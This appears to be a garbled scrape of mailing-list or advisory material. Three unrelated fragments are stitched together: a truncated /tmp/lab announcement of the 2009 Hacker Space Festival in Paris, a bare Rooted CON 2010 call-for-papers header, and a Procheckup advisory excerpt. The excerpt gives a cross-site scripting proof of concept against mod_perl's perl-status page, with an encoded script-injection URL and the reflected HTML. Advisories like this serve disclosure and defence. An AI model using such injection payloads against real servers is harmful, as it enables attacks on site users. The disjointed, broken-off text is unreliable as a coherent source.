========================================================================
/tmp/lab announces the second Hacker Space Festival
(Paris, 26-30 June 2009)
========================================================================
Hacker Space Festival 2009 | Call For Proposals | HSF2009
In 2008, we organized HSF[1] on the spot, as an ad-hoc meeting for
hackerspaces-related networks, technical and artistic research emerging
from them and social questionning arising from them. This sudden
===============================
- Rooted CON 2010 -
C A L L F O R P A P E R S
===============================
.: [ ABOUT ]
Procheckup has found by making a malformed request to perl-status, that additionally a vanilla cross site scripting (XSS) attack is possible.
Proof of concept:
Submitting the following string to an unpatched server "server".
http://server:80/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
The following is returned:-
<p><a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?env">Environment</a><br />
